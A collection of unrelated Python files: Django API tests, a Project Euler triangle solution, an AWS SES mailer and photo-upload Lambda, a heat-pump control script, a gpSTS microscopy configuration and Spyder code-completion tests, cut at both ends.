    response = client.get(reverse("api_v1:autor-list"))
    assert response.status_code == 200
@pytest.mark.django_db
def test_rest_api_autor_filtering_1(api_client, autor):
    """Filtering from the author's own modification time matches the author."""
    timestamp = localtime(autor.ostatnio_zmieniony).strftime("%Y-%m-%d %H:%M:%S")
    response = api_client.get(
        reverse("api_v1:autor-list") + f"?ostatnio_zmieniony_after={timestamp}"
    )
    assert response.json()["count"] == 1
@pytest.mark.django_db
def test_rest_api_autor_filtering_2(api_client, autor):
    """Filtering from one second after the modification time matches nothing."""
    timestamp = localtime(autor.ostatnio_zmieniony + timedelta(seconds=1)).strftime(
        "%Y-%m-%d %H:%M:%S"
    )
    response = api_client.get(
        reverse("api_v1:autor-list") + f"?ostatnio_zmieniony_after={timestamp}"
    )
    assert response.json()["count"] == 0
|
# Project Euler 18: maximum total from top to bottom of the triangle,
# solved bottom-agnostic with a row-by-row dynamic programme.
sss = '''75
95 64
17 47 82
18 35 87 10
20 04 82 47 65
19 01 23 75 03 34
88 02 77 73 07 63 67
99 65 04 28 06 16 70 92
41 41 26 56 83 40 80 70 33
41 48 72 33 47 32 37 16 94 29
53 71 44 65 25 43 91 52 97 51 14
70 11 33 28 77 73 17 78 39 68 17 57
91 71 52 38 17 14 91 43 58 50 27 29 48
63 66 04 68 89 53 67 30 73 16 69 87 40 31
04 62 98 27 23 09 70 98 73 93 38 53 60 04 23'''
# Parse the triangle into a list of integer rows.
a = [[int(num) for num in line.split(' ')] for line in sss.split('\n')]
n = 15
# dp[i][j] = best path sum ending at row i, column j.
dp = [[a[0][0]]]
for i in range(1, n):
    row = []
    for j in range(i + 1):
        best = 0
        if j > 0:
            best = max(best, dp[i - 1][j - 1])
        if j < i:
            best = max(best, dp[i - 1][j])
        row.append(best + a[i][j])
    dp.append(row)
ans = max(dp[n - 1])
# `print ans` was Python 2 statement syntax — a SyntaxError on Python 3.
print(ans)
|
from app.main import app
|
import boto3
import os
import logging
# Single shared SES client; the region comes from the runtime environment.
ses = boto3.client('ses', region_name=os.environ.get('AWS_REGION'))
logger = logging.getLogger('ses-mailer')
logger.setLevel(logging.INFO)
def send_email(email, userName, mailFrom, mailBody):
    """Send an HTML e-mail through AWS SES.

    Args:
        email: Recipient address.
        userName: Recipient display name (used only in log messages).
        mailFrom: Sender address, passed as the SES Source.
        mailBody: HTML body of the message (UTF-8).
    """
    logger.info('Sending mail to {} ({}) via AWS SES'.format(userName, email))
    ses.send_email(
        Source='{}'.format(mailFrom),
        Destination={
            'ToAddresses': [
                email
            ]
        },
        Message={
            'Subject': {
                'Data': 'New Access Key Pair'
            },
            'Body': {
                'Html': {
                    'Data': mailBody,
                    'Charset': 'UTF-8'
                }
            }
        }
    )
    logger.info('Mail sent to {} ({}) via AWS SES'.format(userName, email))
|
"""
MIT License
Copyright (c) 2020 - 2022 Andreas Merkle <web@blue-andi.de>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
================================================================================
"""
import sys
import requests
HEATPUMP_URL = 'http://heatpump.fritz.box'
char_map = {
0xfffd: '?' # Map unknown UTF-8 character to '?'
}
ROOT_MENU_ROW_4 = 'W?rme Info Men?'
BACK_BUTTON_ROW_4 = 'Zur?ck'
CANCEL_BUTTON_ROW_4 = 'Abbr.'
action_list = [{
'row': 4,
'expected': 'W?rme Info Men?',
'action': 'buttonR'
}, {
'row': 2,
'expected': 'Hausw?rme',
'action': 'wheelTR'
}, {
'row': 2,
'expected': 'Warmwassereinst.',
'action': 'buttonR'
}, {
'row': 3,
'expected': 'Extra Warmwasser',
'action': 'buttonR'
}, {
'row': 1,
'expected': ' Extra Warmwasser',
'action': 'buttonR'
}, {
'row': 1,
'expected': ' Extra Warmwasser',
'action': 'wheelTR'
}, {
'row': 4,
'expected': 'Abbr. Speichern',
'action': 'buttonR'
}]
def get_display_content(base_uri, row):
    """Get display row content.
    Args:
        base_uri (str): The base URI of the server.
        row (int): Row number [1; 4]
    Returns:
        str: The row content as string, or '' when the row number is out of
        range or the request fails.
    """
    if not 1 <= row <= 4:
        return ''
    response = requests.get(base_uri + '/api/display/' + str(row),
                            headers={"Content-Type": "application/json"})
    if response.status_code != 200:
        return ''
    # The response may contain control characters, therefore disable strict parsing.
    json_doc = response.json(strict=False)
    # Replace non UTF-8 conform characters with '?'.
    return json_doc['data']['display'].translate(char_map)
def show_display(base_uri):
    """Print all four display rows to the console, framed by separators.

    Args:
        base_uri (str): The base URI of the server.
    """
    separator = "--------------------"
    print(separator)
    for line_no in (1, 2, 3, 4):
        print(get_display_content(base_uri, line_no))
    print(separator)
def manipulate_keyboard(base_uri, hmi_device):
    """Trigger a HMI control (button press or wheel turn) via REST.

    Args:
        base_uri (str): The base URI of the server.
        hmi_device (str): The HMI specific name, see REST API.

    Returns:
        boolean: If successful it will return True otherwise False.
    """
    reply = requests.post(
        base_uri + '/api/frontPanel/' + hmi_device,
        headers={"Content-Type": "application/json"})
    return reply.status_code == 200
def press_left_button(base_uri):
    """Press the left button of the HMI (typically "back"/"cancel").

    Args:
        base_uri (str): The base URI of the server.

    Returns:
        boolean: If successful it will return True otherwise False.
    """
    result = manipulate_keyboard(base_uri, 'buttonL')
    return result
def press_right_button(base_uri):
    """Press the right button of the HMI (typically "select"/"confirm").

    Args:
        base_uri (str): The base URI of the server.

    Returns:
        boolean: If successful it will return True otherwise False.
    """
    result = manipulate_keyboard(base_uri, 'buttonR')
    return result
def turn_wheel_left(base_uri):
    """Turn the selection wheel of the HMI one step to the left.

    Args:
        base_uri (str): The base URI of the server.

    Returns:
        boolean: If successful it will return True otherwise False.
    """
    result = manipulate_keyboard(base_uri, 'wheelTL')
    return result
def turn_wheel_right(base_uri):
    """Turn the selection wheel of the HMI one step to the right.

    Args:
        base_uri (str): The base URI of the server.

    Returns:
        boolean: If successful it will return True otherwise False.
    """
    result = manipulate_keyboard(base_uri, 'wheelTR')
    return result
if __name__ == '__main__':
    RET_VAL = 0 # Success
    # The menu shall be in the root menu
    row_4 = get_display_content(HEATPUMP_URL, 4)
    # Walk back up the menu hierarchy: as long as row 4 shows a
    # back/cancel label, pressing the left button goes one level up.
    while row_4 != ROOT_MENU_ROW_4:
        if row_4.startswith(BACK_BUTTON_ROW_4) or row_4.startswith(CANCEL_BUTTON_ROW_4):
            if press_left_button(HEATPUMP_URL) is False:
                RET_VAL = 1 # Error
                break
            else:
                row_4 = get_display_content(HEATPUMP_URL, 4)
        else:
            # Unknown screen: abort rather than press buttons blindly.
            RET_VAL = 2 # Error
            break
    if RET_VAL == 0:
        # Execute the actions in the action list to trigger
        # extra warm water.
        for action in action_list:
            # Get expected string on the display from the specified row.
            # This will be used to check whether we are in the correct menu
            # and to avoid configuring something bad.
            row_content = get_display_content(HEATPUMP_URL, action['row'])
            # Does the expected string on the display not match?
            if row_content.startswith(action['expected']) is False:
                show_display(HEATPUMP_URL)
                print('Expected: "' + action['expected'] + '"')
                RET_VAL = 3 # Error
                break
            else:
                # We are in the correct menu, execute action on HMI.
                if manipulate_keyboard(HEATPUMP_URL, action['action']) is False:
                    print('Invalid action.')
                    RET_VAL = 4 # Error
                    break
    #show_display(HEATPUMP_URL)
    sys.exit(RET_VAL)
|
import json
import base64
import boto3
import os
import uuid
import botocore
import imghdr
# Module-level AWS clients, created once per Lambda execution environment
# so they are reused across warm invocations.
s3 = boto3.client('s3')
dynamodb = boto3.client('dynamodb')
def upload_metadata(key, userid):
    """Record the S3 location of an uploaded photo in DynamoDB.

    Reads the target table and bucket names from the ``table`` and
    ``bucket`` environment variables.

    Args:
        key: S3 object key of the uploaded image.
        userid: Identifier of the owning user.
    """
    item = {
        "userid": {'S': userid},
        "photo_reference": {
            'M': {'Bucket': {'S': os.environ['bucket']},
                  'Key': {'S': key}},
        },
    }
    response = dynamodb.put_item(TableName=os.environ['table'], Item=item)
    # Log the raw DynamoDB response to CloudWatch for debugging.
    print(response)
def upload_image(image_id, img, userid):
    """Store an image in S3 and register its metadata in DynamoDB.

    Args:
        image_id: Unique identifier used as the S3 key stem.
        img: Raw image bytes.
        userid: Identifier of the owning user.

    Returns:
        bool: True on success, False if the S3/DynamoDB call failed.
    """
    bucket = os.environ['bucket']
    # imghdr.what() returns None for unrecognized data; fall back to a
    # generic extension instead of producing a literal "<id>.None" key.
    extension = imghdr.what(None, h=img) or 'bin'
    key = f"{image_id}.{extension}"
    try:
        s3.put_object(Bucket=bucket, Key=key, Body=img)
        upload_metadata(key, userid)
    except botocore.exceptions.ClientError as e:
        # Best-effort: log and report failure so the caller can return
        # an error response instead of crashing the invocation.
        print(e)
        return False
    return True
def _response(status_code, message):
    """Build an API Gateway proxy response with permissive CORS headers."""
    return {
        'statusCode': status_code,
        'headers': {
            'Access-Control-Allow-Headers': '*',
            'Access-Control-Allow-Origin': '*',
            'Access-Control-Allow-Methods': 'OPTIONS,POST,GET'
        },
        'body': json.dumps(message)
    }


def handler(event, context):
    """Lambda entry point: decode a base64 photo upload and store it.

    Args:
        event: API Gateway proxy event; ``event['body']`` must be a JSON
            document with ``userid`` and base64-encoded ``photo`` fields.
        context: Lambda context object (unused).

    Returns:
        dict: API Gateway proxy response (200 on success, 400 for a
        malformed request, 500 on a storage failure).
    """
    print(event)
    # Generate random image id
    image_id = str(uuid.uuid4())
    try:
        data = json.loads(event['body'])
        userid = data['userid']
        img = base64.b64decode(data['photo'])
    except (KeyError, TypeError, ValueError) as e:
        # Malformed request: previously this raised out of the handler
        # and surfaced as a Lambda invocation error; report a client
        # error instead. (binascii.Error is a ValueError subclass.)
        print(e)
        return _response(400, 'Malformed request!')
    if upload_image(image_id, img, userid):
        return _response(200, 'Success!')
    return _response(500, 'Request Failed!')
|
# -*- coding: utf-8 -*-
#
# John C. Thomas 2021 gpSTS
###########################################
###Configuration File######################
###for gpSTS steering of experiments######
###########################################
import os
import numpy as np
from gpsts.NanonisInterface.nanonis_interface import Nanonis
from gpsts.NanonisInterface.data_class import ScanData, SpecCounter, PointList, ImageInfo
from gpsts.NanonisInterface.kernel import kernel_l2
import json
###############################
###Initialize##################
###############################
# Experiment configuration: instrument/file settings for the Nanonis STM
# ("Nanonis_Settings") and hyperparameters for the spectra classifier
# ("Neural_Network"). The dict is also written to data/<File>.json below
# so the run is reproducible.
nanonis_config = {
    "Nanonis_Settings": {
        "File": "gpSTSinit",
        "ExperimentName": "Test Out",
        "Version": "0.0.1",
        "ImageStart": "test_img001.sxm",
        "FolderLocation": "C:\\gpSTS\\src\\",
        "DataLocation": "C:\\gpSTS\\src\\data\\",
        "Channel": "Z",
        "ImDirection": "forward",
        "SpectralRange": [-1,1],
        "NumSpectralPoints": 1200,
        "Center_Point": [174,34],
        "Search_Window": 40,
        "Feature_Window": 20,
        "ScanCurrent": 30e-12,
        "SpecCurrent": 200e-12,
        "STSbias": "Bias calc (V)",
        "STSsignal": "Current (A)"
    },
    "Neural_Network": {
        "TrainingPath": "C:\\gpSTS\\src\\train\\",
        "EpochNumber": 2,
        "ClassNumber": 4,
        "LearningRate": 0.001,
        "BatchSizeTrain": 5,
        "BatchSizeVal": 1,
        "BatchSizeTest": 1
    }
}
# Persist the configuration next to the measurement data.
with open('data/'+str(nanonis_config['Nanonis_Settings']['File'])+'.json','w') as fil:
    json.dump(nanonis_config, fil, sort_keys = True, indent = 4, ensure_ascii = False)
# Global scan-state object shared by the steering routines below.
Vals = ScanData()
Vals.update_file_info(nanonis_config['Nanonis_Settings']['FolderLocation'],
    nanonis_config['Nanonis_Settings']['ImageStart'], nanonis_config['Nanonis_Settings']['Channel'],
    nanonis_config['Nanonis_Settings']['ImDirection'])
Vals.update_search_conditions(nanonis_config['Nanonis_Settings']['Center_Point'],
    nanonis_config['Nanonis_Settings']['Search_Window'],nanonis_config['Nanonis_Settings']['Feature_Window'],
    nanonis_config['Nanonis_Settings']['SpectralRange'])
fil_path, imfile, channel, imdirection = Vals.get_file_info()
# Read offsets, pixel counts and physical size from the initial .sxm
# image header; the file must already exist under <FolderLocation>data\.
try:
    imoff, impix, imsize = Nanonis.readheader(fil_path+'data'+'\\',imfile)
except Exception as e:
    print('Error. Please save '+str(imfile)+' within '+str(fil_path)+'data\\')
    raise e
Vals.update_scan_conditions(imoff, impix, imsize)
# Output directories for plotted images and raw data.
imdirectory = fil_path+'data'+'\\'+'impath'
if not os.path.exists(imdirectory):
    os.makedirs(imdirectory)
datadirectory = fil_path+'data'
if not os.path.exists(datadirectory):
    os.makedirs(datadirectory)
def return_scandata():
    """Return the module-global ScanData instance."""
    return Vals
# Counter limiting the number of spectra taken per run.
spec_counter = SpecCounter()
spec_counter.update_maxcnt(10)
def return_cnt():
    """Return the module-global spectroscopy counter."""
    return spec_counter
# List of points where spectra have already been recorded.
recorded_points = PointList()
def return_pntlist():
    """Return the module-global list of measured points."""
    return recorded_points
# Load the starting scan image and plot the full frame.
imout = Nanonis.readimage(fil_path+'data'+'\\'+imfile,channel,imdirection)
current_image = ImageInfo(imout)
def return_image():
    """Return the module-global ImageInfo for the current scan image."""
    return current_image
Nanonis.sxm_plot(imout,imdirectory,'current',recorded_points.get_list())
# Crop a Feature_Window-sized patch centered on Center_Point and plot it;
# this is the region the GP steering operates on.
center_point, search_window, feature_window, spec_range = Vals.get_search_conditions()
imx1, imx2 = int((center_point[0]-(feature_window/2))), int((center_point[0]+(feature_window/2)))
imy1, imy2 = int((center_point[1]-(feature_window/2))), int((center_point[1]+(feature_window/2)))
imtrack = imout[imx1:imx2,imy1:imy2]
Nanonis.sxm_plot(imtrack,imdirectory,'feature',recorded_points.get_list())
###############################
###General#####################
###############################
from controls import perform_NanonisExp_BiasSpec, perform_experiment_overlap2
from gpsts.NanonisInterface.graph import plot_2d_function
# gpCAM input space: two pixel coordinates, each ranging over the scan
# image's pixel grid (impix read from the .sxm header above).
parameters = {
    "x1": {
        "element interval": [1,int(impix[0][0])],
    },
    "x2": {
        "element interval": [1,int(impix[0][0])],
    },
}
###acquisition functions###
def my_ac_func(x, obj):
    """Acquisition function: pure posterior-variance (exploration) steering.

    Args:
        x: Candidate input position(s) to evaluate.
        obj: Gaussian-process object exposing ``posterior_covariance``.

    Returns:
        The posterior covariance ``v(x)`` at ``x``; the optimizer seeks
        the point of largest uncertainty for the next measurement.
    """
    # The original draft also computed the posterior mean, the Shannon
    # information gain and a UCB score, but only the covariance was ever
    # returned; the dead computations are removed to save three extra
    # GP evaluations per acquisition call.
    return obj.posterior_covariance(x)["v(x)"]
# gpCAM model definition: one GP with an L2 kernel, steered by the
# covariance-based acquisition function above; data acquisition is done
# by running a Nanonis bias spectroscopy at the suggested point.
gaussian_processes = {
    "model_1": {
        "kernel function": kernel_l2,
        "hyperparameters": [1.0,1.0,1.0],
        "hyperparameter bounds": [[1.0,100.0],[0.10,100.0],[0.10,100.0]],
        "input hyper parameters": [1.0,1.0,1.0],
        "output hyper parameters": [1.0],
        "input hyper parameter bounds": [[0.01,1000000.0],[0.01,10.0],[0.01,10.0]],
        "output hyper parameter bounds":[[0.9,1.1]],
        "number of returns": 1,
        "dimensionality of return": 1,
        "variance optimization tolerance": 0.001,
        "adjust optimization threshold": [True,0.1],
        "steering mode": "covariance",
        "run function in every iteration": None,
        "data acquisition function": perform_NanonisExp_BiasSpec,
        "acquisition function": my_ac_func,
        "objective function": None,
        "mean function": None,
        "cost function": None,
        "cost update function": None,
        "cost function parameters": {"offset": 10,"slope":2.0},
        "cost function optimization bounds": [[0.0,10.0],[0.0,10.0]],
        "cost optimization chance" : 0.1,
        "plot function": plot_2d_function,
        "acquisition function optimization tolerance": 0.001
    },
}
# --- gpCAM runtime/optimizer settings ------------------------------------
# Compute backend and linear-algebra options.
compute_device = "cpu"
sparse = False
compute_inverse = False
# Likelihood (hyperparameter) optimization.
initial_likelihood_optimization_method = "global"
training_dask_client = False
prediction_dask_client = False
likelihood_optimization_tolerance = 1e-12
likelihood_optimization_max_iter = 200
automatic_signal_variance_range_determination = True
# Acquisition-function optimization.
acquisition_function_optimization_method = "global"
chance_for_local_acquisition_function_optimization = 0.5
acquisition_function_optimization_population_size = 20
acquisition_function_optimization_max_iter = 20
# Re-train schedules (iteration counts at which each optimizer runs).
global_likelihood_optimization_at = [200]
hgdl_likelihood_optimization_at = []
local_likelihood_optimization_at = []
breaking_error = 1e-18
########################################
###Variance Optimization################
########################################
objective_function_optimization_population_size = 20
likelihood_optimization_population_size = 20
number_of_suggested_measurements = 1
########################################
###Computation Parameters###############
########################################
global_kernel_optimization_frequency = 0.2
local_kernel_optimization_frequency = 0.5
gpu_acceleration = False
rank_n_update = [False,0.2]
gp_system_solver = "inv" # "inv", "cg" or "minres"
switch_system_solver_to_after = [True, "cg", 5000]
###############################
###DATA ACQUISITION############
###############################
# Start from a single random measurement; stop after 10 spectra.
initial_data_set_size = 1
max_number_of_measurements = 10
#####################################################################
###############END###################################################
#####################################################################
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
#
"""Tests for code completion."""
# Standard library imports
import os
import os.path as osp
import random
import textwrap
import sys
# Third party imports
from flaky import flaky
import pytest
import pytestqt
from qtpy.QtCore import Qt
from qtpy.QtGui import QTextCursor
# rtree is an optional dependency; snippet-related tests are skipped
# below when it is not importable.
try:
    from rtree import index
    rtree_available = True
except Exception:
    rtree_available = False
# Local imports
from spyder.plugins.completion.manager.api import (
LSPRequestTypes, CompletionItemKind)
from spyder.plugins.completion.kite.providers.document import KITE_COMPLETION
from spyder.plugins.completion.kite.utils.status import (
check_if_kite_installed, check_if_kite_running)
from spyder.py3compat import PY2
from spyder.config.manager import CONF
# Location of this file (absolute directory of the test module).
LOCATION = osp.realpath(osp.join(os.getcwd(), osp.dirname(__file__)))
def set_executable_config_helper(executable=None):
    """Point Spyder's main-interpreter configuration at *executable*.

    When *executable* is None the configuration is reset to the default
    interpreter (``sys.executable``, the one running the tests).
    """
    if executable is None:
        settings = [
            ('default', True),
            ('custom', False),
            ('custom_interpreter', sys.executable),
            ('custom_interpreters_list', [sys.executable]),
            ('executable', sys.executable),
        ]
    else:
        settings = [
            ('default', False),
            ('custom', True),
            ('custom_interpreter', executable),
            ('custom_interpreters_list', [executable]),
            ('executable', executable),
        ]
    for option, value in settings:
        CONF.set('main_interpreter', option, value)
@pytest.mark.slow
@pytest.mark.first
def test_space_completion(lsp_codeeditor, qtbot):
    """Validate completion's space character handling.

    Typing ``from numpy `` followed by Tab must offer ``import`` and the
    completion widget must close itself after insertion.
    """
    code_editor, _ = lsp_codeeditor
    # Disable on-the-fly behavior so only the explicit Tab press below
    # triggers the completion request.
    code_editor.toggle_automatic_completions(False)
    code_editor.toggle_code_snippets(False)
    CONF.set('editor', 'completions_wait_for_ms', 0)
    completion = code_editor.completion_widget
    # Set cursor to start
    code_editor.go_to_line(1)
    # Complete from numpy --> from numpy import
    qtbot.keyClicks(code_editor, 'from numpy ')
    with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
        code_editor.document_did_change()
    # press tab and get completions
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyPress(code_editor, Qt.Key_Tab)
    assert "import" in [x['label'] for x in sig.args[0]]
    assert code_editor.toPlainText() == 'from numpy import'
    assert not completion.isVisible()
    # Restore editor defaults for subsequent tests.
    code_editor.toggle_automatic_completions(True)
    code_editor.toggle_code_snippets(True)
@pytest.mark.slow
@pytest.mark.first
@flaky(max_runs=5)
@pytest.mark.skipif(bool(os.environ.get('CI', None)), reason='Fails on CI!')
def test_hide_widget_completion(lsp_codeeditor, qtbot):
    """Validate hiding completion widget after a delimeter or operator.

    Once the widget is showing, typing any delimiter/operator character
    must dismiss it.
    """
    code_editor, _ = lsp_codeeditor
    completion = code_editor.completion_widget
    # Characters after which the completion widget must not stay open.
    delimiters = ['(', ')', '[', ']', '{', '}', ',', ':', ';', '@', '=', '->',
                  '+=', '-=', '*=', '/=', '//=', '%=', '@=', '&=', '|=', '^=',
                  '>>=', '<<=', '**=']
    code_editor.toggle_automatic_completions(False)
    code_editor.toggle_code_snippets(False)
    # Set cursor to start
    code_editor.set_text('')
    code_editor.completion_widget.hide()
    code_editor.go_to_line(1)
    # Complete from numpy import --> from numpy import ?
    qtbot.keyClicks(code_editor, 'from numpy import ')
    with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
        code_editor.document_did_change()
    # Press tab and get completions
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000):
        qtbot.keyPress(code_editor, Qt.Key_Tab)
    # Check the completion widget is visible
    assert completion.isHidden() is False
    # Write a random delimeter on the code editor
    delimiter = random.choice(delimiters)
    print(delimiter)
    qtbot.keyClicks(code_editor, delimiter)
    qtbot.wait(1000)
    # Check the completion widget is not visible
    assert completion.isHidden() is True
    # Restore editor defaults for subsequent tests.
    code_editor.toggle_automatic_completions(True)
    code_editor.toggle_code_snippets(True)
def _drain_pending_completions(qtbot, completion, code_editor):
    """Consume and hide any completion pop-ups that arrive late.

    With automatic completions enabled, ``sig_show_completions`` can fire
    again after an assertion already consumed the previous signal; keep
    hiding the widget until no further signal arrives within the timeout.
    """
    while True:
        try:
            with qtbot.waitSignal(completion.sig_show_completions,
                                  timeout=5000):
                pass
            code_editor.completion_widget.hide()
        except Exception:
            break


@pytest.mark.slow
@pytest.mark.first
@flaky(max_runs=5)
@pytest.mark.skipif(
    os.environ.get('CI') and (PY2 and os.name != 'nt'),
    reason='Fails on CI with Mac/Linux and Python 2')
def test_automatic_completions(lsp_codeeditor, qtbot):
    """Test on-the-fly completions while typing ``from numpy import r``."""
    code_editor, _ = lsp_codeeditor
    completion = code_editor.completion_widget
    code_editor.toggle_code_snippets(False)
    # Set cursor to start
    code_editor.go_to_line(1)
    # Complete f -> from
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyClicks(code_editor, 'f')
    assert "from" in [x['label'] for x in sig.args[0]]
    # qtbot.keyPress(code_editor, Qt.Key_Tab)
    qtbot.keyClicks(code_editor, 'rom')
    # Due to automatic completion, the completion widget may appear before
    _drain_pending_completions(qtbot, completion, code_editor)
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyClicks(code_editor, ' n')
    assert "ntpath" in [x['label'] for x in sig.args[0]]
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyClicks(code_editor, 'ump')
    assert "numpy" in [x['label'] for x in sig.args[0]]
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyClicks(code_editor, 'y')
    # Due to automatic completion, the completion widget may appear before
    _drain_pending_completions(qtbot, completion, code_editor)
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyClicks(code_editor, ' imp')
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyPress(code_editor, Qt.Key_Tab)
    assert code_editor.toPlainText() == 'from numpy import'
    # Due to automatic completion, the completion widget may appear before
    _drain_pending_completions(qtbot, completion, code_editor)
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyClicks(code_editor, ' r')
    assert "random" in [x['label'] for x in sig.args[0]]
    code_editor.toggle_code_snippets(True)
@pytest.mark.slow
@pytest.mark.first
@flaky(max_runs=5)
def test_automatic_completions_tab_bug(lsp_codeeditor, qtbot):
    """
    Test on-the-fly completions.

    Autocompletions should not be invoked when Tab/Backtab is pressed.

    See: spyder-ide/spyder#11625
    """
    code_editor, _ = lsp_codeeditor
    completion = code_editor.completion_widget
    code_editor.toggle_code_snippets(False)
    code_editor.set_text('x = 1')
    code_editor.set_cursor_position('sol')
    # Neither key may trigger a completion request, so each waitSignal is
    # expected to time out; reaching `assert False` would mean the signal
    # was (incorrectly) emitted.
    for key in (Qt.Key_Tab, Qt.Key_Backtab):
        try:
            with qtbot.waitSignal(completion.sig_show_completions,
                                  timeout=5000):
                qtbot.keyPress(code_editor, key)
            assert False
        except pytestqt.exceptions.TimeoutError:
            pass
@pytest.mark.slow
@pytest.mark.first
@flaky(max_runs=5)
def test_automatic_completions_space_bug(lsp_codeeditor, qtbot):
    """Test that completions are not invoked when pressing the space key."""
    code_editor, _ = lsp_codeeditor
    completion = code_editor.completion_widget
    code_editor.toggle_code_snippets(False)
    code_editor.set_text('x = 1')
    code_editor.set_cursor_position('sol')
    qtbot.keyPress(code_editor, Qt.Key_Right)
    # The space press must NOT trigger a completion request, so the
    # waitSignal is expected to time out; reaching `assert False` would
    # mean the signal was (incorrectly) emitted.
    try:
        with qtbot.waitSignal(completion.sig_show_completions,
                              timeout=5000):
            qtbot.keyPress(code_editor, Qt.Key_Space)
        assert False
    except pytestqt.exceptions.TimeoutError:
        pass
@pytest.mark.slow
@flaky(max_runs=3)
def test_automatic_completions_parens_bug(lsp_codeeditor, qtbot):
    """
    Test on-the-fly completions.

    Autocompletions for variables don't work inside function calls.
    Note: Don't mark this as first because it fails on Windows.

    See: spyder-ide/spyder#10448
    """
    code_editor, _ = lsp_codeeditor
    completion = code_editor.completion_widget
    code_editor.toggle_code_snippets(False)
    # Parens:
    # Set cursor to start
    code_editor.set_text('my_list = [1, 2, 3]\nlist_copy = list((my))')
    cursor = code_editor.textCursor()
    code_editor.moveCursor(cursor.End)
    # Move cursor next to list((my$))
    qtbot.keyPress(code_editor, Qt.Key_Left)
    qtbot.keyPress(code_editor, Qt.Key_Left)
    qtbot.wait(500)
    # Complete my_ -> my_list
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=5000) as sig:
        qtbot.keyClicks(code_editor, '_')
    assert "my_list" in [x['label'] for x in sig.args[0]]
    # Square braces:
    # Set cursor to start
    code_editor.set_text('my_dic = {1: 1, 2: 2}\nonesee = 1\none = my_dic[on]')
    cursor = code_editor.textCursor()
    code_editor.moveCursor(cursor.End)
    # Move cursor next to my_dic[on$]
    qtbot.keyPress(code_editor, Qt.Key_Left)
    qtbot.wait(500)
    # Complete one -> onesee
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=5000) as sig:
        qtbot.keyClicks(code_editor, 'e')
    assert "onesee" in [x['label'] for x in sig.args[0]]
    # Curly braces:
    # Set cursor to start
    code_editor.set_text('my_dic = {1: 1, 2: 2}\nonesee = 1\none = {on}')
    cursor = code_editor.textCursor()
    code_editor.moveCursor(cursor.End)
    # Move cursor next to {on*}
    qtbot.keyPress(code_editor, Qt.Key_Left)
    qtbot.wait(500)
    # Complete one -> onesee
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=5000) as sig:
        qtbot.keyClicks(code_editor, 'e')
    assert "onesee" in [x['label'] for x in sig.args[0]]
@pytest.mark.slow
@pytest.mark.first
@flaky(max_runs=5)
def test_completions(lsp_codeeditor, qtbot):
    """Exercise code completion in several ways.

    Covers dunder-module and underscore-variable completion, accepting
    with Enter/Tab, narrowing the list by typing, completing inside
    existing text, and cases that must NOT emit completions.
    """
    code_editor, _ = lsp_codeeditor
    completion = code_editor.completion_widget
    code_editor.toggle_automatic_completions(False)
    code_editor.toggle_code_snippets(False)
    # Set cursor to start
    code_editor.go_to_line(1)
    # Complete dunder imports from _ --> import _foo/_foom
    qtbot.keyClicks(code_editor, 'from _')
    with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
        code_editor.document_did_change()
    # press tab and get completions
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyPress(code_editor, Qt.Key_Tab)
    assert "__future__" in [x['label'] for x in sig.args[0]]
    code_editor.set_text('')  # Delete line
    code_editor.go_to_line(1)
    # Complete underscore variables
    qtbot.keyClicks(code_editor, '_foo = 1;_foom = 2;_fo')
    with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
        code_editor.document_did_change()
    # press tab and get completions
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyPress(code_editor, Qt.Key_Tab)
    completions = [x['label'] for x in sig.args[0]]
    assert "_foo" in completions
    assert "_foom" in completions
    code_editor.set_text('')  # Delete line
    code_editor.go_to_line(1)
    # Complete import mat--> import math
    qtbot.keyClicks(code_editor, 'import mat')
    with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
        code_editor.document_did_change()
    # press tab and get completions
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyPress(code_editor, Qt.Key_Tab)
    assert "math" in [x['label'] for x in sig.args[0]]
    # enter should accept first completion
    qtbot.keyPress(completion, Qt.Key_Enter, delay=300)
    assert code_editor.toPlainText() == 'import math'
    # enter for new line
    qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
    # Complete math.h() -> math.hypot()
    qtbot.keyClicks(code_editor, 'math.h')
    with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
        code_editor.document_did_change()
